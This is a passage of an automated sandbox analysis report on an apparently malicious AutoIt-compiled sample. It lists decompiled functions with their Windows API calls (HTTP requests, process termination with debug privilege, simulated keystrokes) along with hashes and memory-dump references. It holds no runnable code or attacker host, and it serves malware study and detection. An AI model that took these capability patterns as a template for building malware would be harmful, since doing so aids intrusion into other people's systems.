                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: b9040cbd97578d59a99ac14f30609361fca46113580b29f45fc5f6077a414f31
                          • Instruction ID: 9a37e9b23c3debd017c13d47da197dcb7c683ce73eb933043494eb1eb32587ed
                          • Opcode Fuzzy Hash: b9040cbd97578d59a99ac14f30609361fca46113580b29f45fc5f6077a414f31
                          • Instruction Fuzzy Hash: 0811B276100118EFEB02EF54E886DDD3BA5BF05350F9144A0FA88AB233DA35FA519F90
                          Function 00701410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                          Download Yara Rule
                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00701459
                          • OleUninitialize.OLE32(?,00000000), ref: 007014F8
                          • UnregisterHotKey.USER32(?), ref: 007016DD
                          • DestroyWindow.USER32(?), ref: 007424B9
                          • FreeLibrary.KERNEL32(?), ref: 0074251E
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0074254B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                          • String ID: close all
                          • API String ID: 469580280-3243417748
                          • Opcode ID: 553f37cfab43a9dc4ff06372d326eda460264161ecf85458991b1758de180fd7
                          • Instruction ID: f225435ddba99d44023a49359209108f4b5b64642c4f2af3381738137a175030
                          • Opcode Fuzzy Hash: 553f37cfab43a9dc4ff06372d326eda460264161ecf85458991b1758de180fd7
                          • Instruction Fuzzy Hash: B2D18031701212CFCB19DF14C899A29F7A0BF05710F9542ADF54AAB2A2DB39AD23CF55
                          Function 00705BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                          Download Yara Rule
                          APIs
                          • SetWindowLongW.USER32(?,000000EB), ref: 00705C7A
                            • Part of subcall function 00705D0A: GetClientRect.USER32(?,?), ref: 00705D30
                            • Part of subcall function 00705D0A: GetWindowRect.USER32(?,?), ref: 00705D71
                            • Part of subcall function 00705D0A: ScreenToClient.USER32(?,?), ref: 00705D99
                          • GetDC.USER32 ref: 007446F5
                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00744708
                          • SelectObject.GDI32(00000000,00000000), ref: 00744716
                          • SelectObject.GDI32(00000000,00000000), ref: 0074472B
                          • ReleaseDC.USER32(?,00000000), ref: 00744733
                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007447C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                          • String ID: U
                          • API String ID: 4009187628-3372436214
                          • Opcode ID: 01ced1be421c417efe3bf49b2e4490d4aa30492b99a50b5dc3982c444ee6c55d
                          • Instruction ID: 1a3a3360f3b5458a92acf78aa15df67251ca1925075cea4115a6e8ffc0e90ff2
                          • Opcode Fuzzy Hash: 01ced1be421c417efe3bf49b2e4490d4aa30492b99a50b5dc3982c444ee6c55d
                          • Instruction Fuzzy Hash: DD710331500205EFDF22CF64C984BBA7BB5FF4A360F14426AED555A1A6C7399C42EF60
                          Function 0077359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007735E4
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • LoadStringW.USER32(007D2390,?,00000FFF,?), ref: 0077360A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LoadString$_wcslen
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 4099089115-2391861430
                          • Opcode ID: 943bd6ede070ebb765a73c95dfde27c6226cb18376d12cd1e48965aa75394f6f
                          • Instruction ID: fb9cee9bd097e718651a352fa0db8eea7f07ed09ca152bf12c02ff13458ae9c8
                          • Opcode Fuzzy Hash: 943bd6ede070ebb765a73c95dfde27c6226cb18376d12cd1e48965aa75394f6f
                          • Instruction Fuzzy Hash: 66516471900209FBDF15EBA0DC86EEEBB78AF04340F548225F60572192DB395B99DFA0
                          Function 0077C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0077C272
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0077C29A
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0077C2CA
                          • GetLastError.KERNEL32 ref: 0077C322
                          • SetEvent.KERNEL32(?), ref: 0077C336
                          • InternetCloseHandle.WININET(00000000), ref: 0077C341
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                          • String ID:
                          • API String ID: 3113390036-3916222277
                          • Opcode ID: aea63bd4bee8bd737e90b68408c9089bf6596a50cde1fa72cb8dc72b3345f708
                          • Instruction ID: 86e84460bb798a8c5b84877324a6fad6dddbb079dd7092f0450bfb450244f267
                          • Opcode Fuzzy Hash: aea63bd4bee8bd737e90b68408c9089bf6596a50cde1fa72cb8dc72b3345f708
                          • Instruction Fuzzy Hash: 50317FB1500604AFDF229FA48C88AAB7BFCFB49784F14C51EF44AD2201DB38DD059B65
                          Function 0076989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00743AAF,?,?,Bad directive syntax error,0079CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 007698BC
                          • LoadStringW.USER32(00000000,?,00743AAF,?), ref: 007698C3
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00769987
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: HandleLoadMessageModuleString_wcslen
                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                          • API String ID: 858772685-4153970271
                          • Opcode ID: f76431c3245770f24bf860a1ab1a9986a5f7c55ce6f5a323f8c4b5f66621c547
                          • Instruction ID: a6706b96b3e10546827e5a147f60ec1f150f605ad921ed31f0ef8f01900f682b
                          • Opcode Fuzzy Hash: f76431c3245770f24bf860a1ab1a9986a5f7c55ce6f5a323f8c4b5f66621c547
                          • Instruction Fuzzy Hash: B4218071C0025AEBDF15EF90CC4AEEE7779BF18300F04445AF619620E2EB39A658DB20
                          Function 0076209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32 ref: 007620AB
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 007620C0
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0076214D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ClassMessageNameParentSend
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 1290815626-3381328864
                          • Opcode ID: 40a4c77f65397e3a523e6081014e9edf8ad98e47e121d069eef11e9127521523
                          • Instruction ID: 8c7bab936c5e04ae6ab28f019023c00c0d0482e5019e22da7c1779127b7729e0
                          • Opcode Fuzzy Hash: 40a4c77f65397e3a523e6081014e9edf8ad98e47e121d069eef11e9127521523
                          • Instruction Fuzzy Hash: 7D113DF628CB0AF6FA056624EC0ADA6379CCB05314B20401AFF05B40D2FE6D6C435514
                          Function 0073CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                          • String ID:
                          • API String ID: 1282221369-0
                          • Opcode ID: b43e0867dd5a04f962838faf4ca12871b7bb29490e693af1d880e8f4c42ecf60
                          • Instruction ID: 1b83e8fd75c208b727fe098ea767d470715c80e15d9b8c2f163682fc37e65928
                          • Opcode Fuzzy Hash: b43e0867dd5a04f962838faf4ca12871b7bb29490e693af1d880e8f4c42ecf60
                          • Instruction Fuzzy Hash: 37612772A05316AFFB26AFB4A889B697BA5EF05310F14416EF940B7243D73E9D01C790
                          Function 00718B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00756890
                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007568A9
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007568B9
                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 007568D1
                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007568F2
                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00718874,00000000,00000000,00000000,000000FF,00000000), ref: 00756901
                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0075691E
                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00718874,00000000,00000000,00000000,000000FF,00000000), ref: 0075692D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                          • String ID:
                          • API String ID: 1268354404-0
                          • Opcode ID: b0323ed22748e5a3ed477028e6b873e5b7cfca3f5644639d4352d8c7a2da4d98
                          • Instruction ID: bd9dbc32156defdf02772f9f28c06e4ba1bdd16fd50348c75a14a9c8ab4e3ff5
                          • Opcode Fuzzy Hash: b0323ed22748e5a3ed477028e6b873e5b7cfca3f5644639d4352d8c7a2da4d98
                          • Instruction Fuzzy Hash: 37518BB0600209EFDB20CF28CC55BAA7BB5FF54751F144519F906972E0DBB8E991DB50
                          Function 0077C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0077C182
                          • GetLastError.KERNEL32 ref: 0077C195
                          • SetEvent.KERNEL32(?), ref: 0077C1A9
                            • Part of subcall function 0077C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0077C272
                            • Part of subcall function 0077C253: GetLastError.KERNEL32 ref: 0077C322
                            • Part of subcall function 0077C253: SetEvent.KERNEL32(?), ref: 0077C336
                            • Part of subcall function 0077C253: InternetCloseHandle.WININET(00000000), ref: 0077C341
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                          • String ID:
                          • API String ID: 337547030-0
                          • Opcode ID: ecb816931360ce5b0881f0980032e7c03352ecea6cf0413e75ab8916d0bbd872
                          • Instruction ID: 0dcbd8bd46c2b5aea8c664b01dedfe2efd1d171a3491c4a91affbfdc577ac6f2
                          • Opcode Fuzzy Hash: ecb816931360ce5b0881f0980032e7c03352ecea6cf0413e75ab8916d0bbd872
                          • Instruction Fuzzy Hash: 3B318B71200605EFDF229FA5DC48A66BBF8FF1C380B54C42EF95A86611D738E9159BA0
                          Function 007625A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00763A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00763A57
                            • Part of subcall function 00763A3D: GetCurrentThreadId.KERNEL32 ref: 00763A5E
                            • Part of subcall function 00763A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007625B3), ref: 00763A65
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 007625BD
                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007625DB
                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007625DF
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 007625E9
                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00762601
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00762605
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0076260F
                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00762623
                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00762627
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                          • String ID:
                          • API String ID: 2014098862-0
                          • Opcode ID: af1a792166d00a1640fc2826904b35587b3536f5c1ee58ff2450e93408ee5158
                          • Instruction ID: 72ace2a315746c4db0fc055b21e850490b482fd1d1578699c1ee325205ae23fb
                          • Opcode Fuzzy Hash: af1a792166d00a1640fc2826904b35587b3536f5c1ee58ff2450e93408ee5158
                          • Instruction Fuzzy Hash: FB012430380614BBFB206768CC8EF593F59DF4EB12F104002F319AE1D1C9EA2842CA6E
                          Function 00761803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00761449,?,?,00000000), ref: 0076180C
                          • HeapAlloc.KERNEL32(00000000,?,00761449,?,?,00000000), ref: 00761813
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00761449,?,?,00000000), ref: 00761828
                          • GetCurrentProcess.KERNEL32(?,00000000,?,00761449,?,?,00000000), ref: 00761830
                          • DuplicateHandle.KERNEL32(00000000,?,00761449,?,?,00000000), ref: 00761833
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00761449,?,?,00000000), ref: 00761843
                          • GetCurrentProcess.KERNEL32(00761449,00000000,?,00761449,?,?,00000000), ref: 0076184B
                          • DuplicateHandle.KERNEL32(00000000,?,00761449,?,?,00000000), ref: 0076184E
                          • CreateThread.KERNEL32(00000000,00000000,00761874,00000000,00000000,00000000), ref: 00761868
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                          • String ID:
                          • API String ID: 1957940570-0
                          • Opcode ID: 1524fa56dd6935361ffe9b6e578538e27e7bc9485055b3e8ff4827eeb1197ddb
                          • Instruction ID: 9bdafcee03ee2c1d6ee44c7858b1303a22b23b48e30ee95042ba37c6a583797c
                          • Opcode Fuzzy Hash: 1524fa56dd6935361ffe9b6e578538e27e7bc9485055b3e8ff4827eeb1197ddb
                          • Instruction Fuzzy Hash: D501BFB5280308BFEB11AB65DD4EF5B3B6CEB89B11F418411FA05DB2A1C6749C01CB38
                          Function 0078A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0076D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0076D501
                            • Part of subcall function 0076D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0076D50F
                            • Part of subcall function 0076D4DC: CloseHandle.KERNEL32(00000000), ref: 0076D5DC
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0078A16D
                          • GetLastError.KERNEL32 ref: 0078A180
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0078A1B3
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0078A268
                          • GetLastError.KERNEL32(00000000), ref: 0078A273
                          • CloseHandle.KERNEL32(00000000), ref: 0078A2C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                          • String ID: SeDebugPrivilege
                          • API String ID: 2533919879-2896544425
                          • Opcode ID: 69679fc5eb461295cb89b76cfa4c2104303c95d09350a910b6f70b8cb89171bb
                          • Instruction ID: 096be58c811eeb525ba03f124287e4ebeebce6033267d7f733d79f149ced5d64
                          • Opcode Fuzzy Hash: 69679fc5eb461295cb89b76cfa4c2104303c95d09350a910b6f70b8cb89171bb
                          • Instruction Fuzzy Hash: C1619F71244242EFE721EF18C498F15BBE1AF44318F18859DE4668B7A3C77AEC45CB92
                          Function 00793886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00793925
                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0079393A
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00793954
                          • _wcslen.LIBCMT ref: 00793999
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 007939C6
                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007939F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$Window_wcslen
                          • String ID: SysListView32
                          • API String ID: 2147712094-78025650
                          • Opcode ID: 6e6b22754c975e2b38d2f77487a8357933ff1537d1964c940c67a6bfb79a54a3
                          • Instruction ID: db73e622d36e9e1a18a04389d29e5301e7f10bca81ed0c3199df42db78f75a2b
                          • Opcode Fuzzy Hash: 6e6b22754c975e2b38d2f77487a8357933ff1537d1964c940c67a6bfb79a54a3
                          • Instruction Fuzzy Hash: 8641B671A00219ABEF21DF64DC49FEA7BA9EF08354F10056AF958E7281D7799D80CB90
                          Function 0076BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0076BCFD
                          • IsMenu.USER32(00000000), ref: 0076BD1D
                          • CreatePopupMenu.USER32 ref: 0076BD53
                          • GetMenuItemCount.USER32(01916C88), ref: 0076BDA4
                          • InsertMenuItemW.USER32(01916C88,?,00000001,00000030), ref: 0076BDCC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                          • String ID: 0$2
                          • API String ID: 93392585-3793063076
                          • Opcode ID: e3774e3db9fa0e10dda7833a11132713e529f172f2b0ed5401c34f743383444f
                          • Instruction ID: ff5a6ab8614ce2057f260615b342235a7b177383e9425aa93349a9c3adb77b0a
                          • Opcode Fuzzy Hash: e3774e3db9fa0e10dda7833a11132713e529f172f2b0ed5401c34f743383444f
                          • Instruction Fuzzy Hash: B451A270700205DBDF11CFA8D888BAEBBF8BF46314F248159EC52DB291D778A981CB61
                          Function 00722D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                          Download Yara Rule
